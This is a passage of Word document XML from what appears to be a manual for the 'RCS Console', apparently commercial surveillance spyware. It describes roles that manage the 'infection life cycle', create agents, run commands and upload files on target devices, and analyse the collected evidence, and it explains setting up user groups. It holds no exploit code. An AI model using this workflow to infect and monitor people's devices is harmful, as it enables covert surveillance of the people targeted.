              <w:t xml:space="preserve">ackend, </w:t>
            </w:r>
            <w:r w:rsidR="00FC58A7" w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>F</w:t>
            </w:r>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">rontends, </w:t>
            </w:r>
            <w:r w:rsidR="00FC58A7" w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>A</w:t>
            </w:r>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">nonymizers and </w:t>
            </w:r>
            <w:r w:rsidR="00FC58A7" w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>N</w:t>
            </w:r>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">etwork </w:t>
            </w:r>
            <w:r w:rsidR="00FC58A7" w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>I</w:t>
            </w:r>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>njectors.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00313178" w:rsidRPr="00240B6F" w:rsidRDefault="00313178" w:rsidP="00313178">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>This role can also manage system backups and configure connectors for third-party software integrations.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0029750F" w:rsidRPr="0029750F" w:rsidRDefault="0029750F" w:rsidP="0029750F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00BC35DB" w:rsidRPr="00240B6F" w:rsidRDefault="00BC35DB" w:rsidP="00313178">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Technician</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00BC35DB" w:rsidRPr="00240B6F" w:rsidRDefault="00313178" w:rsidP="00313178">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">The Technician role is the only one allowed to manage the infection life cycle, from </w:t>
            </w:r>
            <w:r w:rsidR="00FC58A7" w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>F</w:t>
            </w:r>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">actories configurations up to </w:t>
            </w:r>
            <w:r w:rsidR="009F6D7F" w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">the real </w:t>
            </w:r>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>infection</w:t>
            </w:r>
            <w:r w:rsidR="009F6D7F" w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> (</w:t>
            </w:r>
            <w:r w:rsidR="00FC58A7" w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>A</w:t>
            </w:r>
            <w:r w:rsidR="009F6D7F" w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>gent creation)</w:t>
            </w:r>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00887A8A" w:rsidRPr="00240B6F" w:rsidRDefault="007F4E39" w:rsidP="00313178">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>This role</w:t>
            </w:r>
            <w:r w:rsidR="00887A8A" w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> can also run technical operations after infections, like command executions and files upload on </w:t>
            </w:r>
            <w:r w:rsidR="00FC58A7" w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:r w:rsidR="00887A8A" w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>argets devices.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0029750F" w:rsidRPr="0029750F" w:rsidRDefault="0029750F" w:rsidP="0029750F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00BC35DB" w:rsidRPr="00240B6F" w:rsidRDefault="00BC35DB" w:rsidP="00313178">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Evidence Analyst</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00BC35DB" w:rsidRPr="00240B6F" w:rsidRDefault="009F6D7F" w:rsidP="00313178">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">The Evidence Analyst role is considered the investigator role and it’s the only one allowed to access and analyze all the evidences collected from the </w:t>
            </w:r>
            <w:r w:rsidR="00FC58A7" w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>argets devi</w:t>
            </w:r>
            <w:r w:rsidR="000F2135" w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>ces.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00BC35DB" w:rsidRPr="00240B6F" w:rsidRDefault="007F4E39" w:rsidP="00313178">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">This role can also manage Intelligence </w:t>
            </w:r>
            <w:r w:rsidR="00FC58A7" w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>E</w:t>
            </w:r>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>ntities,</w:t>
            </w:r>
            <w:r w:rsidR="00C93347">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> system alerts and data export.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00FF125D" w:rsidRDefault="00FF125D" w:rsidP="00134262">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FF125D" w:rsidRDefault="00FF125D">
      <w:pPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="002175DC" w:rsidRDefault="003C5A31" w:rsidP="00134262">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">After </w:t>
      </w:r>
      <w:r w:rsidR="00FC58A7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>U</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">sers creation you can proceed with </w:t>
      </w:r>
      <w:r w:rsidR="00FC58A7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>G</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>roups management.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00225948" w:rsidRDefault="00225948" w:rsidP="00134262">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r w:rsidR="00FC58A7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>G</w:t>
      </w:r>
      <w:r w:rsidR="00C32F54">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">roup </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">is a </w:t>
      </w:r>
      <w:r w:rsidR="005F2A0D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">specific list of </w:t>
      </w:r>
      <w:r w:rsidR="00FC58A7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>U</w:t>
      </w:r>
      <w:r w:rsidR="005F2A0D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">sers </w:t>
      </w:r>
      <w:r w:rsidR="0008431A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>allocated together.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002175DC" w:rsidRDefault="002175DC" w:rsidP="00225948">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225948" w:rsidTr="002175DC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4957" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="002175DC" w:rsidRDefault="002175DC" w:rsidP="00794182">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00225948" w:rsidRPr="0098176A" w:rsidRDefault="0010013A" w:rsidP="00794182">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>2.</w:t>
            </w:r>
            <w:r w:rsidR="002175DC">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">3 </w:t>
            </w:r>
            <w:r w:rsidR="002175DC" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="002175DC">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> RCS </w:t>
            </w:r>
            <w:r w:rsidR="002175DC" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Console ] Accounting &gt; </w:t>
            </w:r>
            <w:r w:rsidR="002175DC">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Groups &gt; New Group</w:t>
            </w:r>
            <w:r w:rsidR="003A4380">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:object w:dxaOrig="1440" w:dyaOrig="1440">
                <v:shape id="_x0000_s1077" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:236.25pt;height:109.5pt;z-index:251706368;mso-position-horizontal:left;mso-position-horizontal-relative:margin;mso-position-vertical:top;mso-position-vertical-relative:margin">
                  <v:imagedata r:id="rId29" o:title=""/>
                  <w10:wrap type="square" anchorx="margin" anchory="margin"/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_s1077" DrawAspect="Content" ObjectID="_1446455338" r:id="rId30"/>
              </w:object>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="236" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00225948" w:rsidRDefault="00225948" w:rsidP="00134262">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4435" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00225948" w:rsidRPr="00240B6F" w:rsidRDefault="00225948" w:rsidP="00134262">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00225948" w:rsidRPr="00240B6F" w:rsidRDefault="00225948" w:rsidP="00134262">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="003C5A31" w:rsidRPr="00240B6F" w:rsidRDefault="00225948" w:rsidP="003C5A31">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidR="007175AB" w:rsidRPr="00240B6F">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Name</w:t>
            </w:r>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] </w:t>
            </w:r>
            <w:r w:rsidR="007175AB" w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">is the only necessary field </w:t>
            </w:r>
            <w:r w:rsidR="004507DB" w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">to specify, in order to create a new </w:t>
            </w:r>
            <w:r w:rsidR="00FC58A7" w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>G</w:t>
            </w:r>
            <w:r w:rsidR="004507DB" w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>roup.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="004507DB" w:rsidRDefault="004507DB" w:rsidP="00134262">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002175DC" w:rsidRDefault="002175DC" w:rsidP="00134262">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004507DB" w:rsidRDefault="00D53DE1" w:rsidP="00134262">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">As soon as you’ve created a new </w:t>
      </w:r>
      <w:r w:rsidR="00FC58A7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>G</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">roup, it’s necessary to proceed with the allocation of </w:t>
      </w:r>
      <w:r w:rsidR="00FC58A7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>U</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">sers and the selection of </w:t>
      </w:r>
      <w:r w:rsidR="00FC58A7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>O</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>perations, using the two dedicated boxes, as shown below.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002175DC" w:rsidRDefault="002175DC" w:rsidP="0087756C">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4507DB" w:rsidTr="00240B6F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4957" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="002175DC" w:rsidRDefault="002175DC" w:rsidP="00794182">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="004507DB" w:rsidRPr="0098176A" w:rsidRDefault="0010013A" w:rsidP="00794182">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>2.</w:t>
            </w:r>
            <w:r w:rsidR="002175DC">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">4 </w:t>
            </w:r>
            <w:r w:rsidR="002175DC" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="002175DC">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> RCS </w:t>
            </w:r>
            <w:r w:rsidR="002175DC" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Console ] Accounting &gt; </w:t>
            </w:r>
            <w:r w:rsidR="002175DC">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Groups</w:t>
            </w:r>
            <w:r w:rsidR="003A4380">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:object w:dxaOrig="1440" w:dyaOrig="1440">
                <v:shape id="_x0000_s1031" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:237pt;height:102.75pt;z-index:251671552;mso-position-horizontal:left;mso-position-horizontal-relative:margin;mso-position-vertical:top;mso-position-vertical-relative:margin">
                  <v:imagedata r:id="rId31" o:title=""/>
                  <w10:wrap type="square" anchorx="margin" anchory="margin"/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_s1031" DrawAspect="Content" ObjectID="_1446455339" r:id="rId32"/>
              </w:object>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="236" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="004507DB" w:rsidRDefault="004507DB" w:rsidP="00134262">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4435" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="004507DB" w:rsidRPr="00240B6F" w:rsidRDefault="004507DB" w:rsidP="00134262">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="004507DB" w:rsidRPr="00240B6F" w:rsidRDefault="004507DB" w:rsidP="00134262">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="004507DB" w:rsidRPr="00240B6F" w:rsidRDefault="004507DB" w:rsidP="00134262">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidR="00064569" w:rsidRPr="00240B6F">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Users in this Group</w:t>
            </w:r>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] </w:t>
            </w:r>
            <w:r w:rsidR="00064569" w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">allow you to select the users you want to </w:t>
            </w:r>
            <w:r w:rsidR="00AF27CF" w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>allocate</w:t>
            </w:r>
            <w:r w:rsidR="00064569" w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00AF27CF" w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">within </w:t>
            </w:r>
            <w:r w:rsidR="00064569" w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>this group.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="002175DC" w:rsidRDefault="002175DC" w:rsidP="004507DB">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283"/>
        <w:gridCol w:w="4955"/>
      </w:tblGrid>
      <w:tr w:rsidR="004507DB" w:rsidTr="00240B6F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="004507DB" w:rsidRPr="00240B6F" w:rsidRDefault="004507DB" w:rsidP="004507DB">
            <w:pPr>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="004507DB" w:rsidRPr="00240B6F" w:rsidRDefault="004507DB" w:rsidP="004507DB">
            <w:pPr>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="004507DB" w:rsidRPr="00240B6F" w:rsidRDefault="004507DB" w:rsidP="00C93347">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
